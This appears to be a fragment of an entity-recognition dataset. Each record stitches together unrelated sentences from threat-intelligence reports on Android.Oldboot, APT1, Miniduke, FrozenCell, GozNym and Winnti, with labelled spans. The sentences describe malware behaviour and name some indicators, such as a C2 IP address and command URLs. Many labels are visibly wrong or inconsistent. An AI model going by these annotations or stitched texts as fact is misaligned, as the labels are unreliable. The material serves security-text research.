"Indicator"}]}
{"text": "A Russian security firm 'Doctor Web ' identified the first mass distributed Android bootkit malware called 'Android.Oldboot ' , a piece of malware that 's designed to re-infect devices after reboot , even if you delete all working components of it . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware . We believe that APT1 is able to wage such a long-running and extensive cyber espionage campaign in large part because it receives direct government support . The exploits are located in separate web pages .", "spans": [{"start": 32, "end": 35, "label": "Organization"}, {"start": 76, "end": 83, "label": "System"}, {"start": 268, "end": 281, "label": "Organization"}, {"start": 443, "end": 447, "label": "Organization"}]}
{"text": "The bootkit Android.Oldboot has infected more than 350,000 android users in China , Spain , Italy , Germany , Russia , Brazil , the USA and some Southeast Asian countries . It was a targeted attack we are calling \" Machete \" . In seeking to identify the organization behind this activity ,our research found that People \u2019s Liberation Army ( PLA \u2019s ) Unit 61398 is similar to APT1 in its mission , capabilities , and resources . Clients using Internet Explorer version 8 are served with \u201c about.htm \u201d , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads \u201c JavaApplet.html \u201d .", "spans": [{"start": 12, "end": 27, "label": "Malware"}, {"start": 59, "end": 66, "label": "System"}, {"start": 313, "end": 338, "label": "Organization"}, {"start": 341, "end": 344, "label": "Organization"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 375, "end": 379, "label": "Organization"}, {"start": 442, "end": 469, "label": "System"}, {"start": 470, "end": 641, "label": "Indicator"}]}
{"text": "China seems to a mass victim of this kind of malware having a 92 % share . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . PLA Unit 61398 is also located in precisely the same area from which APT1 activity appears to originate . The web page \u201c JavaApplet.html \u201d loads \u201c JavaApplet.class \u201d that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": [{"start": 111, "end": 135, "label": "System"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 235, "end": 238, "label": "Organization"}, {"start": 239, "end": 249, "label": "Organization"}, {"start": 304, "end": 308, "label": "Organization"}, {"start": 356, "end": 371, "label": "Indicator"}, {"start": 382, "end": 398, "label": "Indicator"}, {"start": 401, "end": 473, "label": "Malware"}, {"start": 474, "end": 489, "label": "Vulnerability"}]}
{"text": "A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data , remove the application , open connection for Command and controller . \" Machete \" is a targeted attack campaign with Spanish speaking roots . APT1 is believed to be the 2nd Bureau of the People \u2019s Liberation Army ( PLA ) General Staff Department \u2019s ( GSD ) 3rd Department , which is most commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 . The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": [{"start": 255, "end": 259, "label": "Organization"}, {"start": 286, "end": 325, "label": "Organization"}, {"start": 328, "end": 331, "label": "Organization"}, {"start": 334, "end": 358, "label": "Organization"}, {"start": 364, "end": 367, "label": "Organization"}, {"start": 423, "end": 453, "label": "Organization"}, {"start": 456, "end": 460, "label": "Organization"}, {"start": 466, "end": 476, "label": "Organization"}, {"start": 479, "end": 561, "label": "Malware"}, {"start": 568, "end": 674, "label": "Malware"}]}
{"text": "A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init ' script ( initialize the operating system ) to re-load the malware as you switch on your android . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks . The nature of \u201c Unit 61398 \u2019s \u201d work is considered by China to be a state secret ; however , we believe it engages in harmful \u201c Computer Network Operations. \u201d Unit 61398 is partially situated on Datong Road in Gaoqiaozhen , which is located in the Pudong New Area of Shanghai . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": [{"start": 68, "end": 75, "label": "System"}, {"start": 280, "end": 287, "label": "System"}, {"start": 294, "end": 310, "label": "System"}, {"start": 503, "end": 513, "label": "Organization"}, {"start": 646, "end": 656, "label": "Organization"}, {"start": 778, "end": 804, "label": "System"}, {"start": 925, "end": 931, "label": "Organization"}, {"start": 970, "end": 983, "label": "Vulnerability"}]}
{"text": "When you start your device , this script loads the Trojan 'imei_chk ' ( detects it as Android.Oldboot.1 ) which extract two files libgooglekernel.so ( Android.Oldboot.2 ) and GoogleKernel.apk ( Android.Oldboot.1.origin ) , copy them respectively in /system/lib and /system/app . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list . The central building in this compound is a 130,663 square foot facility that is 12 stories high and was built in early 2007 . It decodes the binary and writes it to a Java temporary directory with name \u201c ntuser.bin \u201d .", "spans": [{"start": 86, "end": 103, "label": "Indicator"}, {"start": 130, "end": 148, "label": "Indicator"}, {"start": 151, "end": 168, "label": "Indicator"}, {"start": 175, "end": 191, "label": "Indicator"}, {"start": 194, "end": 218, "label": "Indicator"}, {"start": 249, "end": 276, "label": "Indicator"}, {"start": 340, "end": 347, "label": "Organization"}]}
{"text": "Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download , remove installed apps , and install malicious apps . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code . APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations , and has demonstrated the capability and intent to steal from dozens of organizations simultaneously . Then , it copies the system file \u201c rundll32.exe \u201d to the same directory with name \u201c ntuser.exe \u201d and runs it with \u201c ntuser.bin \u201d as a parameter , effectively loading the malicious DLL file .", "spans": [{"start": 0, "end": 15, "label": "Malware"}, {"start": 97, "end": 115, "label": "Indicator"}, {"start": 354, "end": 358, "label": "Organization"}, {"start": 586, "end": 598, "label": "Indicator"}, {"start": 635, "end": 645, "label": "Indicator"}, {"start": 667, "end": 677, "label": "Indicator"}, {"start": 717, "end": 739, "label": "Malware"}]}
{"text": "Since it becomes a part of the boot partition , formatting the device will not solve the problem . We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) . Since 2006 , Mandiant has observed APT1 compromise 141 companies spanning 20 major industries . That DLL file is the main module of Miniduke , and it uses the URL http://twitter.com/TamicaCGerald to fetch commands .", "spans": [{"start": 225, "end": 230, "label": "Organization"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 273, "end": 279, "label": "Organization"}, {"start": 284, "end": 291, "label": "Organization"}, {"start": 292, "end": 295, "label": "Organization"}, {"start": 313, "end": 321, "label": "Organization"}, {"start": 335, "end": 339, "label": "Organization"}, {"start": 463, "end": 495, "label": "Indicator"}]}
{"text": "The researchers believe that the devices somehow had the malware pre-loaded at the time of shipping from the manufacturer , or was likely distributed inside modified Android firmware . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community . APT1 has a well-defined attack methodology , honed over years and designed to steal large volumes of valuable intellectual property . The web page \u201c about.htm \u201d implements an exploit for Microsoft Internet Explorer 8 .", "spans": [{"start": 166, "end": 173, "label": "System"}, {"start": 374, "end": 391, "label": "Organization"}, {"start": 394, "end": 398, "label": "Organization"}, {"start": 543, "end": 552, "label": "Indicator"}, {"start": 581, "end": 610, "label": "System"}]}
{"text": "So , users should beware of certain modified Android firmware . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China . Once APT1 has established access , they periodically revisit the victim \u2019s network over several months or years and steal broad categories of intellectual property , including technology blueprints , proprietary manufacturing processes , test results , business plans , pricing documents , partnership agreements , and emails and contact lists from victim organizations \u2019 leadership . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 83, "end": 92, "label": "System"}, {"start": 230, "end": 234, "label": "Organization"}, {"start": 544, "end": 550, "label": "System"}, {"start": 672, "end": 687, "label": "Vulnerability"}]}
{"text": "Two weeks ago , Some Chinese Security Researchers have also detected a bootkit called 'Oldboot ' , possibly the same malware or another variant of it . The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems . APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email \u2014 GETMAIL and MAPIGET . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor \u2019s code .", "spans": [{"start": 218, "end": 256, "label": "Organization"}, {"start": 328, "end": 335, "label": "Organization"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 490, "end": 495, "label": "System"}, {"start": 498, "end": 505, "label": "Malware"}, {"start": 510, "end": 517, "label": "Malware"}, {"start": 520, "end": 652, "label": "Indicator"}, {"start": 657, "end": 673, "label": "Organization"}]}
{"text": "\" Due to the special RAM disk feature of Android devices ' boot partition , all current mobile antivirus products in the world ca n't completely remove this Trojan or effectively repair the system . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail . Establishing a foothold involves actions that ensure control of the target network \u2019s systems from outside the network . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 601, "end": 614, "label": "Vulnerability"}]}
{"text": "'' \" According to our statistics , as of today , there 're more than 500 , 000 Android devices infected by this bootkit in China in last six months . Where they exist , they often use grey market or pirated software . APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed . [ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": [{"start": 79, "end": 86, "label": "System"}, {"start": 184, "end": 195, "label": "System"}, {"start": 199, "end": 215, "label": "System"}, {"start": 218, "end": 222, "label": "Organization"}, {"start": 251, "end": 256, "label": "System"}]}
{"text": "The Android malware Android.Oldboot is almost impossible to remove , not even with formatting your device . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer . A backdoor is software that allows an intruder to send commands to the system remotely . The PE file also appeared to be a modification of the Miniduke 's main backdoor module that uses the same Twitter URL as the Java payload .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 20, "end": 35, "label": "Malware"}, {"start": 180, "end": 189, "label": "Malware"}, {"start": 491, "end": 523, "label": "Malware"}, {"start": 562, "end": 574, "label": "Malware"}]}
{"text": "But if your device is not from a Chinese manufacturer , then chances that you are a victim of it , are very less . GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide . In almost every case , APT backdoors initiate outbound connections to the intruder \u2019s \u201c command and control \u201d ( C2 ) server . We have discovered and analysed two previously unknown infector vectors that were used in the MiniDuke attacks .", "spans": [{"start": 193, "end": 202, "label": "Organization"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 393, "end": 395, "label": "System"}, {"start": 501, "end": 517, "label": "Organization"}]}
{"text": "This bootkit is not the first of this kind . After that , the attacker is capable to control the compromised device . APT intruders employ this tactic because while network firewalls are generally adept at keeping malware outside the network from initiating communication with systems inside the network , they are less reliable at keeping malware that is already inside the network from communicating to systems outside . As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": [{"start": 470, "end": 474, "label": "Organization"}, {"start": 479, "end": 491, "label": "System"}, {"start": 563, "end": 589, "label": "Organization"}]}
{"text": "Two years back , in the month of March we reported , NQ Mobile Security Research Center uncovered the world 's first Android bootkit malware called 'DKFBootKit ' , that replaces certain boot processes and can begin running even before the system is completely booted up . The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT , the vast majority of the time they use what appear to be their own custom backdoors . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": [{"start": 53, "end": 71, "label": "Organization"}, {"start": 117, "end": 124, "label": "System"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 301, "end": 318, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 342, "end": 353, "label": "Organization"}, {"start": 357, "end": 372, "label": "Organization"}, {"start": 375, "end": 386, "label": "Organization"}, {"start": 464, "end": 468, "label": "Organization"}, {"start": 533, "end": 543, "label": "Malware"}, {"start": 548, "end": 557, "label": "Malware"}, {"start": 646, "end": 657, "label": "Organization"}, {"start": 676, "end": 707, "label": "Organization"}, {"start": 731, "end": 758, "label": "Organization"}]}
{"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone . The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 . We will describe APT1 \u2019s backdoors in two categories : \u201c Beachhead Backdoors \u201d and \u201c Standard Backdoors. \u201d The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": [{"start": 4, "end": 19, "label": "Malware"}, {"start": 118, "end": 125, "label": "System"}, {"start": 155, "end": 163, "label": "Indicator"}, {"start": 379, "end": 388, "label": "Organization"}, {"start": 432, "end": 436, "label": "Organization"}, {"start": 552, "end": 559, "label": "Malware"}, {"start": 589, "end": 638, "label": "Malware"}]}
{"text": "Users are recommended to install apps from authorized stores such as Google Play , disable installation of apps from 'Unknown Sources ' and for a better security install a reputed security application . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . Beachhead backdoors are typically minimally featured . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": [{"start": 69, "end": 80, "label": "System"}, {"start": 216, "end": 246, "label": "Organization"}, {"start": 295, "end": 309, "label": "System"}, {"start": 564, "end": 582, "label": "Organization"}, {"start": 583, "end": 596, "label": "Organization"}]}
{"text": "You can also try to re-flash your device with its original ROM . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks . They offer the attacker a toe-hold to perform simple tasks like retrieve files , gather basic system information and trigger the execution of other more significant capabilities such as a standard backdoor . The attackers work from computers with Chinese and Korean language configurations .", "spans": [{"start": 85, "end": 91, "label": "System"}, {"start": 217, "end": 234, "label": "Organization"}, {"start": 484, "end": 493, "label": "Organization"}, {"start": 504, "end": 561, "label": "System"}]}
{"text": "After flashing , the bootkit will be removed . The APT group is reportedly targeting the Middle East region . APT1 \u2019s beachhead backdoors are usually what we call WEBC2 backdoors . They used their unauthorized access to obtain digital certificates that were later exploited in malware campaigns targeting other industries and political activists .", "spans": [{"start": 110, "end": 114, "label": "Organization"}, {"start": 163, "end": 178, "label": "Malware"}, {"start": 277, "end": 294, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}, {"start": 326, "end": 345, "label": "Organization"}]}
{"text": "FrozenCell : Multi-Platform Surveillance Campaign Against Palestinians October 5 , 2017 FrozenCell has been seen masquerading as various well known social media and chat applications as well as an app likely only used by Palestinian or Jordanian students sitting their 2016 general exams . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team . WEBC2 backdoors are probably the most well-known kind of APT1 backdoor , and are the reason why some security companies refer to APT1 as the \u201c Comment Crew. \u201d A WEBC2 backdoor is designed to retrieve a webpage from a C2 server . So far , there 's no evidence that customers of the infected game companies were targeted , although in at least one case , malicious code was accidentally installed on gamers ' computers by one of the infected victim companies .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 88, "end": 98, "label": "Malware"}, {"start": 336, "end": 339, "label": "System"}, {"start": 342, "end": 360, "label": "Organization"}, {"start": 386, "end": 391, "label": "Organization"}, {"start": 488, "end": 502, "label": "Organization"}, {"start": 510, "end": 525, "label": "Malware"}, {"start": 567, "end": 571, "label": "Organization"}, {"start": 639, "end": 643, "label": "Organization"}, {"start": 671, "end": 685, "label": "Malware"}, {"start": 727, "end": 729, "label": "System"}, {"start": 774, "end": 814, "label": "Organization"}, {"start": 863, "end": 877, "label": "Malware"}, {"start": 908, "end": 926, "label": "Organization"}, {"start": 937, "end": 966, "label": "Organization"}]}
{"text": "Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland . It expects the webpage to contain special HTML tags ; the backdoor will attempt to interpret the data between the tags as commands . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 75, "end": 85, "label": "Malware"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 233, "end": 248, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 331, "end": 335, "label": "System"}, {"start": 422, "end": 431, "label": "Organization"}, {"start": 491, "end": 502, "label": "Malware"}, {"start": 525, "end": 531, "label": "Malware"}]}
{"text": "The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . Older versions of WEBC2 read data between HTML comments , though over time WEBC2 variants have evolved to read data contained within other types of tags . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": [{"start": 159, "end": 164, "label": "Organization"}, {"start": 188, "end": 194, "label": "System"}, {"start": 245, "end": 249, "label": "Organization"}, {"start": 253, "end": 256, "label": "System"}, {"start": 261, "end": 276, "label": "System"}, {"start": 297, "end": 302, "label": "Malware"}, {"start": 321, "end": 325, "label": "System"}, {"start": 354, "end": 359, "label": "Malware"}, {"start": 452, "end": 468, "label": "Organization"}, {"start": 502, "end": 511, "label": "Organization"}]}
{"text": "FrozenCell is the mobile component of a multi-platform attack we 've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 , '' use to spy on victims through compromised mobile devices and desktops . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany . From direct observation , we can confirm that APT1 was using WEBC2 backdoors as early as July 2006 . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 100, "end": 128, "label": "Malware"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 249, "end": 263, "label": "System"}, {"start": 264, "end": 270, "label": "System"}, {"start": 295, "end": 300, "label": "Organization"}, {"start": 360, "end": 364, "label": "Organization"}, {"start": 375, "end": 390, "label": "Malware"}, {"start": 530, "end": 544, "label": "Malware"}]}
{"text": "The desktop components of this attack , previously discovered by Palo Alto Network , are known as KasperAgent and Micropsia . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks . However , the first compile time35 we have for WEBC2 is 2004-01-23 , suggesting that APT1 has been crafting WEBC2 backdoors since early 2004 . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": [{"start": 65, "end": 82, "label": "Organization"}, {"start": 98, "end": 109, "label": "Malware"}, {"start": 114, "end": 123, "label": "Malware"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 319, "end": 324, "label": "Malware"}, {"start": 357, "end": 361, "label": "Organization"}, {"start": 380, "end": 395, "label": "Malware"}, {"start": 461, "end": 468, "label": "Malware"}, {"start": 482, "end": 495, "label": "Organization"}, {"start": 500, "end": 516, "label": "Malware"}]}
{"text": "We discovered 561MB of exfiltrated data from 24 compromised Android devices while investigating this threat . Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task . Based on the 400+ samples of WEBC2 variants that we have accumulated , it appears that APT1 has direct access to developers who have continually released new WEBC2 variants for over six years . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 142, "end": 146, "label": "Organization"}, {"start": 182, "end": 188, "label": "Organization"}, {"start": 267, "end": 272, "label": "Malware"}, {"start": 325, "end": 329, "label": "Organization"}, {"start": 396, "end": 401, "label": "Malware"}, {"start": 451, "end": 460, "label": "Organization"}]}
{"text": "More data is appearing daily , leading us to believe the actors are still highly active . The malware is distributed primarily through laced spam emails that lure recipients into opening attachments . WEBC2 backdoors are often packaged with spear phishing emails . Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": [{"start": 201, "end": 216, "label": "Malware"}, {"start": 256, "end": 262, "label": "System"}, {"start": 265, "end": 285, "label": "System"}, {"start": 360, "end": 388, "label": "Organization"}]}
{"text": "We are continuing to watch it closely . Kessem . Once installed , APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice . The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": [{"start": 40, "end": 46, "label": "Organization"}, {"start": 66, "end": 70, "label": "Organization"}, {"start": 192, "end": 222, "label": "System"}, {"start": 290, "end": 308, "label": "Organization"}]}
{"text": "This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany . WEBC2 backdoors work for their intended purpose , but they generally have fewer features than the \u201c Standard Backdoors \u201d described below . Attackers frequently abuse stolen certificates to prevent the malware they 're spreading from being detected by various security protections .", "spans": [{"start": 178, "end": 183, "label": "Organization"}, {"start": 200, "end": 214, "label": "System"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 269, "end": 284, "label": "Malware"}, {"start": 408, "end": 417, "label": "Organization"}]}
{"text": "Government agencies and enterprises should look at this threat as an example of the kind of spying that is now possible given how ubiquitous mobile devices are in the workplace . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday . The standard , non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol ( to blend in with legitimate web traffic ) or a custom protocol that the malware authors designed themselves . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": [{"start": 183, "end": 189, "label": "System"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 220, "end": 232, "label": "Organization"}, {"start": 252, "end": 258, "label": "Organization"}, {"start": 261, "end": 279, "label": "Organization"}, {"start": 291, "end": 294, "label": "Organization"}, {"start": 327, "end": 336, "label": "Malware"}, {"start": 337, "end": 341, "label": "Organization"}, {"start": 384, "end": 388, "label": "Indicator"}, {"start": 557, "end": 584, "label": "Organization"}]}
{"text": "Attackers are keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning . These backdoors give APT intruders a laundry list of ways to control victim systems . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": [{"start": 155, "end": 162, "label": "System"}, {"start": 236, "end": 242, "label": "System"}, {"start": 247, "end": 259, "label": "System"}, {"start": 446, "end": 455, "label": "Organization"}]}
{"text": "All Lookout customers are protected from this threat . In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks . The BISCUIT backdoor ( so named for the command \u201c bdkzt \u201d ) is an illustrative example of the range of commands that APT1 has built into its \u201c standard \u201d backdoors . Kaspersky has more here .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 193, "end": 209, "label": "Malware"}, {"start": 239, "end": 244, "label": "Malware"}, {"start": 306, "end": 310, "label": "Organization"}, {"start": 355, "end": 364, "label": "Organization"}]}
{"text": "What it does FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym \u2013 Nymaim \u2013 appear up to the task . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently . Whether known as commodity malware or \u201c as - a - service , \u201d threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": [{"start": 13, "end": 23, "label": "Malware"}, {"start": 78, "end": 86, "label": "System"}, {"start": 89, "end": 97, "label": "System"}, {"start": 100, "end": 109, "label": "System"}, {"start": 112, "end": 116, "label": "System"}, {"start": 123, "end": 131, "label": "System"}, {"start": 273, "end": 277, "label": "Organization"}, {"start": 313, "end": 319, "label": "Organization"}, {"start": 344, "end": 350, "label": "System"}, {"start": 386, "end": 390, "label": "Organization"}, {"start": 422, "end": 429, "label": "Malware"}, {"start": 506, "end": 523, "label": "Malware"}, {"start": 550, "end": 563, "label": "Organization"}]}
{"text": "We also detected it in apps targeted toward specific Middle Eastern demographics . Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain . Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol . The software is centrally hosted on that third - party company \u2019s servers .", "spans": [{"start": 301, "end": 305, "label": "Indicator"}, {"start": 358, "end": 390, "label": "System"}]}
{"text": "For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June . When network defenders see the communications between these backdoors and their C2 servers , they might easily dismiss them as legitimate network traffic . Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": [{"start": 32, "end": 42, "label": "Malware"}, {"start": 69, "end": 81, "label": "Indicator"}, {"start": 218, "end": 224, "label": "System"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 398, "end": 400, "label": "System"}, {"start": 512, "end": 519, "label": "System"}, {"start": 523, "end": 527, "label": "System"}]}
{"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem . APT1 . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": [{"start": 27, "end": 37, "label": "Malware"}, {"start": 526, "end": 532, "label": "System"}, {"start": 674, "end": 680, "label": "Organization"}, {"start": 683, "end": 687, "label": "Organization"}, {"start": 690, "end": 703, "label": "Organization"}, {"start": 782, "end": 799, "label": "Malware"}]}
{"text": "from only one misconfigured command and control server ( out of over 37 servers ) . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . APT1 maintains an extensive infrastructure of computers around the world . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": [{"start": 106, "end": 112, "label": "System"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 253, "end": 268, "label": "Organization"}, {"start": 273, "end": 296, "label": "Organization"}, {"start": 331, "end": 335, "label": "Organization"}, {"start": 419, "end": 432, "label": "Organization"}, {"start": 440, "end": 464, "label": "System"}]}
{"text": "This is only a small picture of the threat actor 's operations . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation . We have evidence suggesting that APT1 manually controls thousands of systems in support of their attacks , and have directly observed their control over hundreds of these systems . It can range from asking \u201c customers \u201d to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": [{"start": 197, "end": 205, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 531, "end": 544, "label": "Organization"}]}
{"text": "Split of exfiltrated data Some noteworthy files identified in content taken from compromised devices include passport photos , audio recordings of calls , other images , and a PDF document with data on 484 individuals . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . Although they control systems in dozens of countries , their attacks originate from four large networks in Shanghai \u2014 two of which are allocated directly to the Pudong New Area , the home of Unit 61398 . Recently , this model for threat actors has come to be known as the \u201c as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": [{"start": 326, "end": 337, "label": "System"}, {"start": 340, "end": 356, "label": "Malware"}, {"start": 363, "end": 377, "label": "System"}, {"start": 571, "end": 581, "label": "Organization"}, {"start": 610, "end": 623, "label": "Organization"}]}
